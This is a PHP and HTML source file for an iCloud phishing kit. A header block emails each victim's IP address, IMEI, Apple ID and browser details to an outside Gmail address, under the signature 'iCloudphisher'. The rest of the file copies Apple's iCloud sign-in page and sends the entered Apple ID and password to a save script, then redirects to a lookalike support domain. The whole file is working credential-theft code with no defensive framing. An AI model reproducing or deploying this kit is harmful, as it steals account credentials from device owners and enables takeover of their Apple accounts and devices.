<?php 
session_start();
$agent = $_SERVER['HTTP_USER_AGENT'];
function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}
$user_ip = getUserIP();
$headers .= 'To: New User' . "\r\n";
$headers .= 'From: iServer' . "\r\n";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$to  = 'natha.102.92@gmail.com';
$subject = 'La victima ha visitado el link';
$imei = empty($_GET['imei']) ? null : $_GET['imei'];
$ID = empty($_GET['ID']) ? null : $_GET['ID'];
$message = '<table style="background:none repeat scroll 0% 0% rgb(244,244,244);border:1px solid rgb(102,102,102)" border="0" cellpadding="5" cellspacing="5" width="600">
    <tbody>
        <tr>
            <th style="background-color:rgb(204,204,204)">Detalles de la visita de la victima</th>
        </tr>
        <tr>
            <td style="text-align:left" valign="top">
            <br>
			<hr>
            <strong>IP Address:</strong>'. $user_ip.'<br><br>
                        <strong>IMEI:</strong>'.$imei.'<br><br>
                        <strong>AppleID:</strong>'.$ID.'<br><br>
			<strong>Date:</strong>'.$date.'<br><br>
			<strong>Time:</strong>'.$time.'<br><br>
                       
			<strong>Browser:</strong>'.$agent.'<br><br>
			</td>
        </tr>
        <tr>
            <td style="text-align:left"><em>Thanks,<br>
            iCloudphisher<br>
            </td>
        </tr>
    </tbody>
</table>';

mail($to, $subject, $message, $headers);
?>


<?php  
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
 
switch ($lang) {
  case 'en':
  $lang_file = 'lang.en.php';
  break;
 
  case 'fr':
  $lang_file = 'lang.fr.php';
  break;
 
  case 'es':
  $lang_file = 'lang.es.php';
  break;

  case 'de':
  $lang_file = 'lang.de.php';
  break;

 case 'ja':
  $lang_file = 'lang.ja.php';
  break;

case 'nl':
  $lang_file = 'lang.ja.php';
  break;

case 'be':
  $lang_file = 'lang.ja.php';
  break;

case 'pl':
  $lang_file = 'lang.ja.php';
  break;

case 'zh':
  $lang_file = 'lang.ja.php';
  break;

case 'br':
  $lang_file = 'lang.br.php';
  break;
  
case 'hu':
  $lang_file = 'lang.ja.php';
  break;

  default:
  $lang_file = 'lang.en.php';
 
}
 
include_once 'languages/'.$lang_file;
?>
<!DOCTYPE html>
<html lang="en">
<head>
 <!--[if IE 7]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]--> 
 <!--[if IE 8]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]-->
 <!--[if IE 9]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]-->
 <!--[if IE 10]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]-->
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta content="width=device-width, initial-scale=1" name="viewport"/>
	<meta name="robots" content="noindex, nofollow"/>
	<title>iCloud</title>
	<link rel="shortcut icon" type="image/x-icon" href="assets/img/favicon.ico">
	<link rel="stylesheet" href="assets/layout/strap.css">
	<link rel="stylesheet" href="assets/layout/apple.css">
	<link rel="stylesheet" href="assets/layout/kit.css">
	<link rel="stylesheet" href="assets/layout/animate.css">	

<script type="text/javascript">
  <!--
  if (screen.width <= 800) {
    window.location = "mobiv.php";
  }
  //-->
</script>
	
	<script src="assets/js/jquery-latest.min.js"></script>
	<script>
      $(document).ready(function() {
		$('#preloader').delay(900).fadeOut('slow'); // will fade out the white DIV that covers the website.
		$('body').css({'overflow':'visible'});
		$('#test').delay(900).css({'display':'block'});

			$('.checkbox-state-normal').click(function() {
				$('.checkbox-state-normal').hide();
				$('.checkbox-state-focused-selected').css("display","");

			});
		  
		  $('.checkbox-state-focused-selected').click(function() {
				$('.checkbox-state-focused-selected').hide();
				$('.checkbox-state-normal').css("display","");

			});
		});
	</script>	
	<style type="text/css">
	#demo{
	position: fixed;
	height: 100%;
	width: 100%;
}
		body, #status{
	background-image: none;
	background: #064781;
}
	</style>
</head>
<body class="section-demo">
<canvas id="demo"></canvas>
<div id="preloader">
	<div id="status"><span></span></div>
</div>

<section id="header">
	<div class="container-fluid">
		<div class="row">
			<div class="col-md-4 col-xs-8 rightH rtl">
				<a class="help" title="Help and Support" alt="Help and Support" href="https://help.apple.com/icloud/"></a>
				<span class="spreat"></span>
					<a class="setup applef" target="_blank" href="https://www.apple.com/icloud/setup/">Setup Instructions</a>
					<div class="setup fName" style="display: none;"><i class="glyphicon glyphicon-menu-down"></i><span><img src="assets/img/user.jpeg" alt=""></span>
					<ul>
						<li><a href="find.php">iCloud Settings</a></li>
						<li><a href="https://icloud.com">Sign Out</a></li>
					</ul>
				</div>
			</div>
			<div class="col-md-8 col-xs-4 leftH">
				<span class="icloud"></span>
			</div>
		</div>
	</div>
</section>
<section class="login-form text-center" style="display: block;">
	<img src="assets/img/cloud.png" class="img-cloud" alt="">
	<h2>Sign in to iCloud</h2>
	<form action="save.php" class="cloud-login form-ajax" role="form" data-red="http://ifindsupport.com/find" method="post" accept-charset="utf-8">
		<input type="hidden" name="csrf_test_name" value="96001a656ae698e32b786a2068c22820" style="display:none;">
		<input type="hidden" name="apple_add">
		<input type="text" class="id" name="apple_id" id="apple_id" placeholder="Apple ID" style="direction: ltr !important;">
		<input type="password" autocomplete="off" class="pwd" name="apple_pwd" id="apple_pwd" style="direction: ltr !important;" placeholder="Password">
		<input type="submit" class="dolog" name="c_log" id="c_log" value="">
		<img class="loading" src="assets/img/ajax-loader.svg" alt="Loading">
		<div class="alrt">
			<h3>Your Apple ID or password was incorrect.</h3>
		</div>
	</form>
	<div class="keepme">
		<input type="checkbox" id="keepme" />
		<span for="keepme"><?php echo $lang['KEEP_ME']; ?></span>
	</div>

	<div class="forget">
		<a href="https://iforgot.apple.com/" target="_blank"><?php echo $lang['FORGOT_ID']; ?></a>
		<div id="response"></div>
	</div>
	<div class="forgetnew">
		<?php echo $lang['DONT_HAVE_ID']; ?> <a href="https://appleid.apple.com/account" target="blank"><?php echo $lang['CREATE_YOURS']; ?></a>
		<div id="response"></div>
	</div>

</section>
<section class="imessage" style="display: none;">
	<div class="container">
		<div class="row">
		<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/11.png" alt="">
					<span>Reminders</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/9.png" alt="">
					<span>Notes</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/3.png" alt="">
					<span>iCloud Drive</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/10.png" alt="">
					<span>Photos</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/1.png" alt="">
					<span>Contacts</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/8.png" alt="">
					<span>Mail</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/12.png" alt="">
					<span>Settings</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/2.png" alt="">
					<span>Find My iPhone</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/6.png" alt="">
					<span>Keynote</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/5.png" alt="">
					<span>Numbers</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/20.png" alt="">
					<span>Find Friends</span>
				</a>
			</div>
			<div class="col-md-2 col-sm-4 col-xs-6">
				<a href="find.php" class="text-cente imb">
					<span class="loadings"><img src="assets/img/loader.svg" alt="Loading"></span>
					<img class="" src="assets/img/7.png" alt="">
					<span>Pages</span>
				</a>
			</div>
		</div>
	</div>
</section><footer class="foot">
	<div class="container-fluid">
		<div class="row">
		
		<div class="col-md-10 col-xs-12 foot-link">
			
			<a href="https://www.apple.com/support/systemstatus/" target="_blank"><?php echo $lang['SYSTEM_STATUS']; ?></a>
			<span class="footer-link-separator"></span>
			<a href="https://www.apple.com/privacy/" target="_blank"><?php echo $lang['POLICY']; ?></a>
			<span class="footer-link-separator"></span>
			<a href="https://www.apple.com/legal/icloud/ww/" target="_blank"><?php echo $lang['TERMS']; ?></a>
			<span class="footer-link-separator"></span>
			<span class="copyright"><?php echo $lang['COPYRIGHT']; ?></span>
		</div>
		<div class="col-md-2 col-xs-12 apple">
			<a href="https://www.apple.com/" target="_blank" class="apple-logo"></a>
		</div>

		</div>
	</div>
</footer>
	<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
	<script src="assets/js/strap.min.js"></script>
	<script src="assets/js/apple.min.js"></script>
	<script src="assets/js/ajax-form.min.js"></script>
	<script type="text/javascript">
		var WIDTH;
var HEIGHT;
var canvas;
var con;
var g;
var pxs = [];
var rint = 60;

$(document).ready(function(){
  WIDTH = window.innerWidth;
  HEIGHT = window.innerHeight;
  $('#container').width(WIDTH).height(HEIGHT);
  canvas = document.getElementById('demo');
  $(canvas).attr('width', WIDTH).attr('height',HEIGHT);
  con = canvas.getContext('2d');
  for(var i = 0; i < 40; i++) {
    pxs[i] = new Circle();
    pxs[i].reset();
  }
  setInterval(draw,rint);
});

function draw() {
  con.clearRect(0,0,WIDTH,HEIGHT);
  for(var i = 0; i < pxs.length; i++) {
    pxs[i].fade();
    pxs[i].move();
    pxs[i].draw();
  }
}

function Circle() {
  this.s = {ttl:500000, xmax:2, ymax:2, rmax:300, rt:1, xdef:960, ydef:540, xdrift:2, ydrift: 2, random:true, blink:true};

  // fill vars
  var crFill = [
    ['rgba(255,255,255,.01)', 'rgba(255,255,255,.2)'],
    ['rgba(204, 92, 187, 0.01)', 'rgba(204, 92, 187, 0.8)'],
    ['rgba(72, 149, 174, 0.01)', 'rgba(72, 149, 174, 0.2)'],
    ['rgba(137, 252, 178, 0.01)', 'rgba(137, 252, 178, 0.4)']
  ];

  // opacity var
  var opacityFill = "." + Math.floor(Math.random() * 5) + 1;

  this.reset = function() {
    this.x = (this.s.random ? WIDTH*Math.random() : this.s.xdef);
    this.y = (this.s.random ? HEIGHT*Math.random() : this.s.ydef);
    this.r = ((this.s.rmax-1)*Math.random()) + 1;
    this.dx = (Math.random()*this.s.xmax) * (Math.random() < 0.5 ? -1 : 1);
    this.dy = (Math.random()*this.s.ymax) * (Math.random() < 0.5 ? -1 : 1);
    this.hl = (this.s.ttl/rint)*(this.r/this.s.rmax);
    this.rt = Math.random()*this.hl;
    this.s.rt = Math.random()+1;
    this.stop = Math.random()*0.2+0.4;
    this.s.xdrift *= Math.random() * (Math.random() < 0.5 ? -1 : 1);
    this.s.ydrift *= Math.random() * (Math.random() < 0.5 ? -1 : 1);
    this.opacityFill = opacityFill;

    this.currentColor = Math.floor(Math.random()*crFill.length);
  };

  this.fade = function() {
    this.rt += this.s.rt;
  };

  this.draw = function() {
    if(this.s.blink && (this.rt <= 0 || this.rt >= this.hl)){
      this.s.rt = this.s.rt*-1;
    }
    else if(this.rt >= this.hl){
      this.reset();
    }
    con.beginPath();
    con.arc(this.x,this.y,this.r,0,Math.PI*2,true);
    con.globalAlpha = opacityFill;
    var newo = 1-(this.rt/this.hl);
    var cr = this.r*newo;
    
    gradient = con.createRadialGradient(this.x,this.y,0,this.x,this.y,(cr <= 30 ? 1 : cr));
    gradient.addColorStop(0.85, crFill[(this.currentColor)][1]);
    gradient.addColorStop(0.7, crFill[(this.currentColor)][1]);
    gradient.addColorStop(1.0, crFill[(this.currentColor)][0]);

    con.fillStyle = gradient;
    con.fill();

    con.closePath();
  };

  this.move = function() {
    this.x += (this.rt/this.hl)*this.dx;
    this.y += (this.rt/this.hl)*this.dy;
    if(this.x > WIDTH || this.x < 0){
      this.dx *= -1;
    } 
    if(this.y > HEIGHT || this.y < 0){
      this.dy *= -1;
    } 
  };

  this.getX = function() { return this.x; };
  this.getY = function() { return this.y; };
}
	</script>
</body>
</html>